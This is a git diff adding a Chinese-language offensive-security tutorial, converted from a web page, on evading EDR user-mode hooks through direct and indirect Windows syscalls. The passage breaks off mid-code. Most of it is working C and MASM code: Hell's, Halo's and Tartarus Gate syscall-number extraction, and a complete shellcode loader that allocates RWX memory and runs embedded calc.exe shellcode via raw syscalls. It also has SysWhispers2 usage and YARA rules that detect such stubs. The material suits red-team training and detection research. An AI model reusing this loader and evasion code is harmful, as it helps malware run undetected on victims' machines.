diff --git "a/md/\350\260\203\347\224\250 syscall \345\256\236\347\216\260\347\224\250\346\210\267\346\200\201 Hook \347\273\225\350\277\207 | Raven Medicine.md" "b/md/\350\260\203\347\224\250 syscall \345\256\236\347\216\260\347\224\250\346\210\267\346\200\201 Hook \347\273\225\350\277\207 | Raven Medicine.md" new file mode 100644 index 000000000..db614f7ef --- /dev/null +++ "b/md/\350\260\203\347\224\250 syscall \345\256\236\347\216\260\347\224\250\346\210\267\346\200\201 Hook \347\273\225\350\277\207 | Raven Medicine.md" @@ -0,0 +1,981 @@ +> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [raven-medicine.com](https://raven-medicine.com/books/ec8ce/page/syscallhook) + +> 在上个小节,我们主要是通过对 ntdll 模块进行覆盖或者补丁来移除 hook 实现用户态 hook 的绕过。但是这些... + +在上个小节,我们主要是通过对 ntdll 模块进行覆盖或者补丁来移除 hook 实现用户态 hook 的绕过。但是这些方法涉及到对 ntdll 的纂改,以及对内存权限的修改,具有一定的风险。实际上,我们还有其他途径来实现 hook 的绕过。 + +### **提取 syscall 号码** + +我们可以在 C 项目里定义汇编函数,来实现 NTAPI。我们知道,只需要最少 4 条指令,我们便能成功执行 syscall。但在执行 syscall 之前,我们需要获得目标函数的 SSN。我们可以从磁盘中读取一份干净的 ntdll 并解析得到 SSN,但从磁盘中读取 ntdll 会显得有些可疑,因此最好是解析载入的 ntdll 并设法获得 SSN。 + +#### **Hells Gate** + +Hells Gate 通过 PEB Walking 的方法得到加载的 ntdll 地址以及想要获得 SSN 的函数地址。通过对关键字节的比较来确定这是一个有效的 syscall stub,从而提取出 SSN。其实上个小节我们已经用了这个逻辑了。 + +原始代码关键部分如下: + +``` +if (*((PBYTE)pFunctionAddress + cw) == 0x4c + && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b + && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1 + && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8 + && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00 + && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) { + BYTE high = *((PBYTE)pFunctionAddress + 5 + cw); + BYTE low = *((PBYTE)pFunctionAddress + 4 + cw); + pVxTableEntry->wSystemCall = (high << 8) | low; + break; +} + +``` + +但是,如果要搜索的函数被 hook 了,那么 SSN 可能不会存在于 syscall stub 里 (取决于是什么 EDR 以及覆盖了哪些指令),这样的话,就不能成功获得 ssn 了。因此,Halos Gate 对此进行了改善。 + +#### **Halos Gate** + +我们发现,在 ntdll 里,随着地址的增高,NTAPI 的 SSN 是递增的,反之则递减。因此,如果我们想要搜索的 NTAPI 被 hook 了,可以向上和向下同时继续搜索,例如往下搜索了 **2 跳**发现了一个未被 hook 的 NTAPI,那么要搜索的 NTAPI 的 SSN 就是这个未被 hook 的 NTAPI 的 SSN 再减去 2,即 **Desired_SSN = Clean_SSN - Hop**。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/MygmjRJ3KjEvKnoL-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/MygmjRJ3KjEvKnoL-image.png) + +关键代码部分如下: + +``` +int GoUp -32; +int GoDown 32; +// If the first instruction of the syscall is a an inconditional jump (aka it's hooked) +if (*((PBYTE)pFunctionAddress) == 0xe9) { + // Search beginning pattern of syscall stub through 500 function up and down from our location + for (WORD index = 1; index <= 500; index++) { + // Search the begining of a syscall stub in the next function down + if (*((PBYTE)pFunctionAddress + index * GoDown) == 0x4c + && *((PBYTE)pFunctionAddress + 1 + index * GoDown) == 0x8b + && *((PBYTE)pFunctionAddress + 2 + index * GoDown) == 0xd1 + && *((PBYTE)pFunctionAddress + 3 + index * GoDown) == 0xb8 + && *((PBYTE)pFunctionAddress + 6 + index * GoDown) == 0x00 + && *((PBYTE)pFunctionAddress + 7 + index * GoDown) == 0x00) { + BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoDown); + BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoDown); + // substract the index from the current syscall identifier to find the one of our target function + pVxTableEntry->wSystemCall = (high << 8) | low - index; + return TRUE; + } + // Search the begining of a syscall stub in the next function down + if (*((PBYTE)pFunctionAddress + index * GoUp) == 0x4c + && *((PBYTE)pFunctionAddress + 1 + index * GoUp) == 0x8b + && *((PBYTE)pFunctionAddress + 2 + index * GoUp) == 0xd1 + && *((PBYTE)pFunctionAddress + 3 + index * GoUp) == 0xb8 + && *((PBYTE)pFunctionAddress + 6 + index * GoUp) == 0x00 + && *((PBYTE)pFunctionAddress + 7 + index * GoUp) == 0x00) { + BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoUp); + BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoUp); + // substract the index from the current syscall identifier to find the one of our target function + pVxTableEntry->wSystemCall = (high << 8) | low + index; + return TRUE; + } +} + +``` + +代码里定义了最大搜索跳数为 32,搜索时确实需要注意边界。Halos Gate 也有个小局限性,它以第一条指令是否是 jmp 从而判断函数是否被 hook 了。我们之前说了,不同的 EDR 覆盖的指令不同,有的 EDR 覆盖的不是第 1 条指令,可以是 syscall 之前的任何指令。例如 CrowdStrike 覆盖的是第 2 条指令。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/G2gtx7JTwdq1Kc7F-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/G2gtx7JTwdq1Kc7F-image.png) + +#### **Tartarus Gate** + +Tartarus Gate 相比 Halos Gate 的改动比较小,主要是考虑了更多 EDR 可能 hook 的情况,例如上面截图所示的情况。对前 4 字节逐一对比,还是相对比较可靠的判断。当然了,hook 导致的指令覆盖可能在 syscall 指令之前的任何字节,如果不放心的话,可以增加更多字节比较。 + +下面的代码是我个人对动态获取 SSN 的实现: + +``` +#include +#include +#include +#include +#include + + +//Get module handle for ntdll and kernel32 at the same time +void GetModule(HMODULE* ntdll, HMODULE* kernel32) +{ + PPEB peb = (PPEB)(__readgsqword(0x60)); + PPEB_LDR_DATA ldr = *(PPEB_LDR_DATA*)((PBYTE)peb + 0x18); //PPEB_LDR_DATA pLdr = pPeb->Ldr; + PLIST_ENTRY ntdlllistentry = *(PLIST_ENTRY*)((PBYTE)ldr + 0x30); + *ntdll = *(HMODULE*)((PBYTE)ntdlllistentry + 0x10); + PLIST_ENTRY kernelbaselistentry = *(PLIST_ENTRY*)((PBYTE)ntdlllistentry); + PLIST_ENTRY kernel32listentry = *(PLIST_ENTRY*)((PBYTE)kernelbaselistentry); + *kernel32 = *(HMODULE*)((PBYTE)kernel32listentry + 0x10); +} + +unsigned char QuickGetSSN(PBYTE pFunctionAddress) +{ + const int maxOffset = 10; // You can adjust this based on your requirements. + int offset; + unsigned char ssn_low = -1; + unsigned char ssn_high = -1; + unsigned char ssn = -1; + if (pFunctionAddress[0] == 0x4C && pFunctionAddress[1] == 0x8B && pFunctionAddress[2] == 0xD1 && pFunctionAddress[3] == 0xB8) + { + printf("The function is clean\n"); + char ssn = *((unsigned char*)(pFunctionAddress + 4)); + printf("ID of searched function is: 0x%x\n", ssn); + return ssn; + } + else + { + printf("The function is hooked\n"); + // Search both upwards and downwards. + for (offset = 1; offset <= maxOffset; ++offset) + { + // Check upwards. + PBYTE checkAddress = pFunctionAddress - (0x20 * offset); + if (checkAddress[0] == 0x4C && checkAddress[1] == 0x8B && checkAddress[2] == 0xD1 && checkAddress[3] == 0xB8) + { + ssn_low = *((unsigned char*)(checkAddress + 4)); + ssn_high = *((unsigned char*)(checkAddress + 5)); + ssn = ssn_low * 1 + ssn_high * 16; + printf("Clean sequence found upwards at offset -0x%x, SSN of the unhooked function is 0x%x\n", offset, ssn); + printf("SSN of searched NTAPI is 0x%x\n", (offset + ssn)); + return ssn+offset; + } + + // Check downwards. + checkAddress = pFunctionAddress + (0x20 * offset); + if (checkAddress[0] == 0x4C && checkAddress[1] == 0x8B && checkAddress[2] == 0xD1 && checkAddress[3] == 0xB8) + { + ssn_low = *((unsigned char*)(checkAddress + 4)); + ssn_high = *((unsigned char*)(checkAddress + 5)); + ssn = ssn_low * 1 + ssn_high * 16; + printf("Clean sequence found downwards at offset 0x%x, SSN of the unhooked function is 0x%x\n",offset, ssn); + printf("SSN of searched NTAPI is 0x%x\n", (offset - ssn)); + return ssn-offset; + } + } + } +} + +unsigned char GetSSNByName(IN HMODULE hModule, const CHAR* funcName) +{ + PBYTE pBase = (PBYTE)hModule; + unsigned char ssn_low = -1; + unsigned char ssn_high = -1; + unsigned char ssn = -1; + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) + return -1; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) + return -1; + + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames); + PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions); + PWORD FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals); + for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]); + PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]); + if (_stricmp(funcName, pFunctionName) == 0) + { + + if (pFunctionAddress[0] == 0x4C && pFunctionAddress[1] == 0x8B && pFunctionAddress[2] == 0xD1 && pFunctionAddress[3] == 0xB8) + { + printf("NTAPI %s may not be hooked\n", funcName); + ssn_low = *((unsigned char*)(pFunctionAddress + 4)); + ssn_high = *((unsigned char*)(pFunctionAddress + 5)); + ssn = ssn_low * 1 + ssn_high * 16; + printf("Syscall number of function %s is: 0x%x\n", pFunctionName,ssn); + return ssn; + } + else + { + printf("NTAPI %s is hooked, check surrounding functions\n", funcName); + ssn = QuickGetSSN(pFunctionAddress); + printf("Syscall number of function %s is: 0x%x\n", pFunctionName, ssn); + return ssn; + } + return -1; + } + } + return -1; +} + +int main() +{ + HMODULE ntdll; + HMODULE kernel32; + GetModule(&ntdll, &kernel32); + printf("ntdll base address: %p\n", ntdll); + printf("kernel32 base address: %p\n", kernel32); + unsigned char ssn =GetSSNByName(ntdll, "NtOpenProcess"); + printf("SSN of the NtOpenProcess is 0x%x\n", ssn); + return 0; +} + +``` + +我们人为地给 NtOpenProcess,以及其前向 2 个函数、后向 3 个函数都进行了指令覆盖来模拟 hook。最终,程序成功地发现前向第 3 个函数是没有被 hook 的,提取了其 SSN 后加上 3,得到了 NtOpenProcess 的 SSN。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/P2cJOSA5Bf20xRRH-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/P2cJOSA5Bf20xRRH-image.png) + +### **直接调用 Syscall** + +有了目标函数的 SSN,我们便可以用汇编代码实现 NTAPI 并进行调用了。这里,我们将先讨论直接调用 syscall。我们以经典的 VirtualAlloc + WriteProcessMemory(或者是其他复制数据的函数) + CreateThread + WaitForSingleObject 的代码执行方法为例,当然了,我们使用的是这些 API 的 NTAPI 版本,执行 calc 的 shellcode。 + +#### **直接 syscall** + +在 C 源代码文件里定义 NtAllocateVirtualMemory 函数以及所需的结构体 (尽管该 NTAPI 没有所需的结构体),而在 asm 文件里用汇编代码实现函数功能,这里我们实现 NtAllocateVirtualMemory 的 syscall stub 即可。 **EXTERN_C 宏**允许链接器将该函数定义与汇编代码链接起来,需要保持名称相同。这样,我们就能像调用一般函数一样调用定义的汇编函数了。 + +``` +EXTERN_C NTSTATUS NtAllocateVirtualMemory( + IN HANDLE ProcessHandle, + IN OUT PVOID* BaseAddress, + IN ULONG ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +``` + +``` +.code +<...SNIP...> + +NtAllocateVirtualMemory PROC + mov r10, rcx + mov rax, 18h + syscall + ret +NtAllocateVirtualMemory ENDP + +<...SNIP...> +end + +``` + +以此类推,我们接着去定义其他所需的函数,例如 NtWriteVirtualMemory,NtCreateThreadEx,NtWaitForSingleObject,NtClose 等。因为这些 NTAPI 大都没有微软官方的文档,因此我们需要借助搜索引擎参考已有项目对其的用法。完成后的代码如下: + +**DirectSyscall.c** 代码 + +``` +#include +#include + +typedef struct _PS_ATTRIBUTE +{ + ULONG Attribute; + SIZE_T Size; + union + { + ULONG Value; + PVOID ValuePtr; + } u1; + PSIZE_T ReturnLength; +} PS_ATTRIBUTE, * PPS_ATTRIBUTE; + +typedef struct _UNICODE_STRING +{ + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING, * PUNICODE_STRING; + +typedef struct _OBJECT_ATTRIBUTES +{ + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +typedef struct _PS_ATTRIBUTE_LIST +{ + SIZE_T TotalLength; + PS_ATTRIBUTE Attributes[1]; +} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; + +EXTERN_C NTSTATUS NtAllocateVirtualMemory( + IN HANDLE ProcessHandle, + IN OUT PVOID* BaseAddress, + IN ULONG ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +EXTERN_C NTSTATUS NtWriteVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN PVOID Buffer, + IN SIZE_T NumberOfBytesToWrite, + OUT PSIZE_T NumberOfBytesWritten OPTIONAL); + +EXTERN_C NTSTATUS NtCreateThreadEx( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN HANDLE ProcessHandle, + IN PVOID StartRoutine, + IN PVOID Argument OPTIONAL, + IN ULONG CreateFlags, + IN SIZE_T ZeroBits, + IN SIZE_T StackSize, + IN SIZE_T MaximumStackSize, + IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL); + +EXTERN_C NTSTATUS NtWaitForSingleObject( + IN HANDLE ObjectHandle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER TimeOut OPTIONAL); + +EXTERN_C NTSTATUS NtClose( + IN HANDLE Handle); + + +int main() { + // calc.exe shellcode + unsigned char code[] = "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"; + + + LPVOID allocation_start; + SIZE_T allocation_size = sizeof(code); + HANDLE hThread; + NTSTATUS status; + + allocation_start = nullptr; + + + // Allocate Virtual Memory + if (NtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, (PULONG64)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)==0) + printf("Memory allocated at %p\n", allocation_start); + else + printf("Allocated failed, Error code is %d\n",GetLastError()); + + // Copy shellcode into allocated memory + if (NtWriteVirtualMemory(GetCurrentProcess(), allocation_start, code, sizeof(code), 0)==0) + printf("Copied successfully\n"); + else + printf("Copied failed, Error code is %d\n", GetLastError()); + + + if (NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)allocation_start, NULL, FALSE, NULL, NULL, NULL, NULL)==0) + printf("Executed successfully\n"); + else + printf("Executed failed, Error code is %d\n", GetLastError()); + + // Wait for the end of the thread and close the handle + NtWaitForSingleObject(hThread, FALSE, NULL); + NtClose(hThread); + + return 0; +} + +``` + +**stub.asm** 代码 + +``` +.code + +NtAllocateVirtualMemory PROC + mov r10, rcx + mov rax, 18h + syscall + ret +NtAllocateVirtualMemory ENDP + +NtWriteVirtualMemory PROC + mov r10, rcx + mov rax, 3Ah + syscall + ret +NtWriteVirtualMemory ENDP + +NtCreateThreadEx PROC + mov r10, rcx + mov rax, 0C2h + syscall + ret +NtCreateThreadEx ENDP + +NtWaitForSingleObject PROC + mov r10, rcx + mov rax, 4 + syscall + ret +NtWaitForSingleObject ENDP + +NtClose PROC + mov r10, rcx + mov rax, 0Fh + syscall + ret +NtClose ENDP + + +end + +``` + +为了能编译 masm 文件,我们右键项目,选择 **Build Dependencies -> Build Customizations**,勾选 **masm**。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/ouDmEOA6Lvjc01pk-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/ouDmEOA6Lvjc01pk-image.png) + +右键 asm 代码文件选择属性,**General -> Item Type** 选项选择 **Microsoft Macro Assembler**。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/QJuqgked4UhodQgC-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/QJuqgked4UhodQgC-image.png) + +这样我们便能编译项目里的 masm 代码了。编译后运行程序,我们发现 shellcode 得以成功运行。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/o6aHs00RAIYUxxcO-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/o6aHs00RAIYUxxcO-image.png) + +不过直接 syscall 调用的弊端也是比较显著的,汇编函数在编译后成为操作码存在于程序的代码区,汇编代码与操作码是可预测的一一对应的关系。因此,如果没有对 syscall stub 进行混淆的话,我们可以用如下 yara 规则来检测包含直接 syscall 调用的程序: + +``` +rule direct_syscall +{ + meta: + description = "Hunt for direct syscall" + + strings: + $s1 = {4c 8b d1 48 c7 c0 ?? ?? ?? ?? 0f 05 c3} + $s2 = {4C 8b d1 b8 ?? ?? ?? ?? 0F 05 C3} + condition: + #s1 >=1 or #s2 >=1 +} + +``` + +我们定义了 5 个 syscall stub,都被检测到了。我们可以插入一些 **NOP** 类 (即无实际意义、不影响运行结果) 的指令用于混淆 syscall stub。但即便有混淆,0xf 0x5(syscall) 指令始终存在于代码区,这是可疑的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/EEhQPYmzhhd5SM5L-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/EEhQPYmzhhd5SM5L-image.png) + +此外,从调用栈的视角,是我们程序的某一函数发起了 syscall,而不是 ntdll 空间内的 NTAPI,这是非常可疑的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/eDG3VYrocukn8BnY-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/eDG3VYrocukn8BnY-image.png) + +#### **syswhisper 1&2** + +Syswhisper 1 和 2 可以自动地帮我们生成 C 项目的头文件以及 asm 文件,方便我们发起直接 syscall。Syswhisper 1 是通过检查操作系统的版本从而确定给定 NTAPI 的 SSN,这算是硬编码了,不够灵活。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/cgSWm1nMFyQ8tEVc-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/cgSWm1nMFyQ8tEVc-image.png) + +syswhisper 2 将所有 **Zw** 开头的函数按照地址排序存储进数组里,**SSN** 与**函数地址高低**是正相关,因此,要寻找的函数的 SSN 即为该函数地址在数组里的索引。 + +至于为什么以 Zw 开头,因为其实 NTAPI 的 NT 与 ZW 版本指向同一地址。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/jYBJYtjOb4rwiePZ-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/jYBJYtjOb4rwiePZ-image.png) + +使用 syswhisper 2 的 python 脚本生成所需的**头文件,c 文件**以及 **asm 文件**,可以生成所有的 NTAPI 的相关代码,也可以只生成指定或常用的 NTAPI 的。 + +因为有 asm 文件,所以我们依旧需要启用 masm。把生成的**头文件**加入到 **Header Files** 中,**c 文件**与 **asm 文件**添加至 **Source Files** 中。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/MZRsYBTvJXcqXhMR-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/MZRsYBTvJXcqXhMR-image.png) + +对于主函数的代码,我们可以复用之前的,但别忘了添加 syswhisper2 生成的头文件。就这样,我们也成功执行了 shellcode。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/qObsEgByktoIErkR-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/qObsEgByktoIErkR-image.png) + +我们可以根据 asm 文件中的 WhisperMain 函数代码创建 yara 规则。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/sppIpWkdxz0AfGDl-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/sppIpWkdxz0AfGDl-image.png) + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/xx6UlpxagAcDwBB4-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/xx6UlpxagAcDwBB4-image.png) + +样本规则如下所示: + +``` +rule syswhisper2 +{ + meta: + description = "Hunt for syswhisper2 generated asm code" + + strings: + $s1 = {58 48 89 4C 24 08 48 89 54 24 10 4C 89 44 24 18 4C 89 4C 24 20 48 83 EC 28 8B 0D ?? ?? 00 00 E8 ?? ?? ?? ?? 48 83 C4 28 48 8B 4C 24 08 48 8B 54 24 10 4C 8B 44 24 18 4C 8B 4C 24 20 4C 8B D1 0F 05 C3} + condition: + #s1 >=1 +} + +``` + +这样,我们用 yara 检测到了使用 syswhisper2 的程序。当然了,可以对该函数进行混淆,不过调用栈的嫌疑也很大。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/agYUmPZMOvbHIpNn-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/agYUmPZMOvbHIpNn-image.png) + +### **间接调用 Syscall** + +因为直接 syscall 在调用栈上有着难以掩盖的检测点,间接调用 syscall 应运而生。间接调用 syscall 这个分类下其实也衍生出了多种方法,也包括我近期提出的 MutationGate。 + +#### **间接 syscall** + +间接 syscall 的宗旨是与其直接在程序内执行 syscall 指令,不如在 **ntdll 模块里**寻找一条 syscall 指令,记录其地址,并在项目中用汇编代码定义的 syscall stub 中,将原本的 **syscall 指令**替换为 **jmp ** 指令。如下所示: + +``` +NtAllocateVirtualMemory PROC + mov r10, rcx + mov eax, (ssn of NtAllocateVirtualMemory) + jmp (address of a syscall instruction) + ret +NtAllocateVirtualMemory ENDP + +``` + +我们可以用如下代码获得给定 NTAPI 的 syscall 指令的地址。不过,从**函数调用成功**的角度来看,我们其实不是非得要获得目标 NTAPI 的 syscall 指令的地址。syscall 是一种特殊的 call 指令,根据 RAX/EAX 的值来确定内核层的对应函数,而非 syscall 指令所在的地址。也就是说,如果我们能在其他 DLL 中找到 syscall 指令,也是可以用的。如果我们刻意地选用良性 NTAPI 的 syscall 指令而非目标 NTAPI 的,可能会带来规避上的优势,但也可能适得其反,这取决于 EDR 的检测逻辑。毕竟,在内核层从**调用栈**或**返回地址**的角度是可以看出端倪的。 + +``` +#include +#include +#include +#include +#include + + +//Get module handle for ntdll and kernel32 at the same time +void GetModule(HMODULE* ntdll, HMODULE* kernel32) +{ + PPEB peb = (PPEB)(__readgsqword(0x60)); + PPEB_LDR_DATA ldr = *(PPEB_LDR_DATA*)((PBYTE)peb + 0x18); //PPEB_LDR_DATA pLdr = pPeb->Ldr; + PLIST_ENTRY ntdlllistentry = *(PLIST_ENTRY*)((PBYTE)ldr + 0x30); + *ntdll = *(HMODULE*)((PBYTE)ntdlllistentry + 0x10); + PLIST_ENTRY kernelbaselistentry = *(PLIST_ENTRY*)((PBYTE)ntdlllistentry); + PLIST_ENTRY kernel32listentry = *(PLIST_ENTRY*)((PBYTE)kernelbaselistentry); + *kernel32 = *(HMODULE*)((PBYTE)kernel32listentry + 0x10); +} + + +PBYTE GetSyscallAddr(IN HMODULE hModule, const CHAR* funcName) +{ + PBYTE pBase = (PBYTE)hModule; + PBYTE syscall; + + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) + return 0; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) + return 0; + + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames); + PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions); + PWORD FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals); + for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]); + PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]); + if (_stricmp(funcName, pFunctionName) == 0) + { + syscall = (pFunctionAddress + 0x12); + return syscall; + } + } + return 0; +} + +int main() +{ + HMODULE ntdll; + HMODULE kernel32; + GetModule(&ntdll, &kernel32); + printf("ntdll base address: %p\n", ntdll); + printf("kernel32 base address: %p\n", kernel32); + PBYTE syscall_addr = GetSyscallAddr(ntdll, "NtOpenProcess"); + printf("Address of syscall instruction is 0x%p\n", syscall_addr); + return 0; +} + +``` + +这样,我们成功地获得了一条 syscall 指令的地址,与我们在 WinDBG 中查看到的一致。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/QvP1WKcniSqgyRGA-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/QvP1WKcniSqgyRGA-image.png) + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/IfOQ0dJ983BLbuqv-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/IfOQ0dJ983BLbuqv-image.png) + +有了 syscall 指令的地址,那么可以得到如下代码 (依旧启用 masm): + +**indirectsyscall.cpp** 代码 + +``` +#include +#include +#include +#include +#include + + +extern "C" { + UINT_PTR syscall_addr1; + UINT_PTR syscall_addr2; + UINT_PTR syscall_addr3; + UINT_PTR syscall_addr4; + UINT_PTR syscall_addr5; +} + +typedef struct _PS_ATTRIBUTE +{ + ULONG Attribute; + SIZE_T Size; + union + { + ULONG Value; + PVOID ValuePtr; + } u1; + PSIZE_T ReturnLength; +} PS_ATTRIBUTE, * PPS_ATTRIBUTE; + + +typedef struct _PS_ATTRIBUTE_LIST +{ + SIZE_T TotalLength; + PS_ATTRIBUTE Attributes[1]; +} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; + +EXTERN_C NTSTATUS NtAllocateVirtualMemory( + IN HANDLE ProcessHandle, + IN OUT PVOID* BaseAddress, + IN ULONG ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +EXTERN_C NTSTATUS NtWriteVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN PVOID Buffer, + IN SIZE_T NumberOfBytesToWrite, + OUT PSIZE_T NumberOfBytesWritten OPTIONAL); + +EXTERN_C NTSTATUS NtCreateThreadEx( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN HANDLE ProcessHandle, + IN PVOID StartRoutine, + IN PVOID Argument OPTIONAL, + IN ULONG CreateFlags, + IN SIZE_T ZeroBits, + IN SIZE_T StackSize, + IN SIZE_T MaximumStackSize, + IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL); + +EXTERN_C NTSTATUS NtWaitForSingleObject( + IN HANDLE ObjectHandle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER TimeOut OPTIONAL); + +EXTERN_C NTSTATUS NtClose( + IN HANDLE Handle); + + + +void GetModule(HMODULE* ntdll, HMODULE* kernel32) +{ + PPEB peb = (PPEB)(__readgsqword(0x60)); + PPEB_LDR_DATA ldr = *(PPEB_LDR_DATA*)((PBYTE)peb + 0x18); //PPEB_LDR_DATA pLdr = pPeb->Ldr; + PLIST_ENTRY ntdlllistentry = 